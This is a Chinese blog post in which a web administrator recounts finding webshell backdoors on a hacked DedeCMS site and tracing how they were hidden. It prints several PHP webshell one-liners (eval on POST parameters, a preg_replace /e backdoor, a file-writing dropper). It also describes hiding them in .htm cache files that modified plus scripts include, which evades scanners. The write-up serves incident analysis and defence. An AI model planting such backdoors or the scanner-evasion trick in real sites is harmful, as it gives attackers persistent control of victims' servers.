电脑乐园提供网站建设,服务器,域名等互联网资讯服务

返回首页 微信
微信
手机版
手机版

dedecms无节操的webshell后门

2018-07-05 新闻来源:电脑乐园 围观:3659
电脑广告
手机广告

之前帮某单位用的dedecms做的网站,最近被某黑阔getshell了. 阿里云隔天就给我报警

webshell1.png

打开查看代码都是:

document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);

还有登陆后台发现自定义宏标记里都是类似的代码,生成的文件都在data/cache/***.htm。反正这个网站没有用到宏标记,我的处理方法是删除plus/mytag_js.php和ad_js,php文件。

网上查了资料发现如下:

为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?


无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:


{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}


但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。


最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>
<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);
–>



看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

dedecms-getshell-0day.jpg

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.


具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.


文章底部电脑广告
手机广告位-内容正文底部

相关文章

  • DEDE更换Ueditor修正栏目内容、单页无法保存、图片加水印等问题
    DEDE更换Ueditor修正栏目内容、单页无法保存、图片加水印等问题

        dede使用Ueditor1.4.3.3 并修正单页栏目编辑器栏目内容、单页无法保存、图片加水印、图片附件保存目录、分页标签改变、远程图片自动本地化关闭,修改默认分页符...

    2019-08-13
  • dedecms select_soft_post.php任意文件上传漏洞修复
    dedecms select_soft_post.php任意文件上传漏洞修复

    漏洞公告:dedecms任意文件上传漏洞简介:dedecms变量覆盖漏洞导致任意文件上传。修复方案:方案一:使用云盾自研补丁进行一键修复; 方案二:更新该软件到官方最新版本或寻求该软件提供商...

    2019-08-05
  • 设置 X-Frame-Options为 SAMEORIGIN
    设置 X-Frame-Options为 SAMEORIGIN

    昨天一个客户发了一份名称为“某某网MatriXayWeb应用安全评估报告”给我,叫我处理里面提到的几个漏洞,其中一个低微漏洞叫“X-Frame-Options Header未配置”如果是自己的服务器,...

    2018-08-21
  • 解决“不能确定应用到此机器的组策略安全性设置”
    解决“不能确定应用到此机器的组策略安全性设置”

    最近服务器重新装了系统,根据阿里云的建议进行加固系统,操作到本地策略的审核策略时出现了如下图片的问题“不能确定应用到此机器的组策略安全性设置。在尝试从本地安全策略数据库(%windir% securi...

    2018-08-19
  • Dede做的站再次被黑
    Dede做的站再次被黑

    凌晨5点多,阿里云给我发了一封邮件,提示网站发现后门(Webshell)文件,想都不用想,肯定是DEDE做的那个网站。早上登陆阿里云果然如我所料,赶紧登陆服务器查看发现上图的那些东东。Dede真是够了...

    2018-08-18
  • 服务器宽带被占用导致网站无法打开
    服务器宽带被占用导致网站无法打开

    这两天服务器遇到了严重的问题,远程连接一直出现系统错误,重启服务器后偶尔可以远程连接进去,发现奇卡无比,带宽被跑满了。阿里云后台监视图:服务器上的资源监视器:占用最多宽带的竟然是system进程,搞得...

    2018-08-09
  • dede webshell事件阴魂不散
    dede webshell事件阴魂不散

    dede真的不让我省心,当初选择用dede建站现在肠子都悔青了。可能是我太菜了怎么也做不好dede的安全,隔三差五都出现webshell,打算换一个cms重新做了。...

    2018-07-23
  • 怎样让你的dedecms更安全?
    怎样让你的dedecms更安全?

    一、安全删除篇:织梦的功能模块是很多的,对于一般企业而言,简单的文档发布就够用了,删除一些不用的模块是做好安全的第一步。可以删除的模块如下,请各位朋友按照需求删除。尤其是plus目录的一些文件,未用到...

    2018-06-16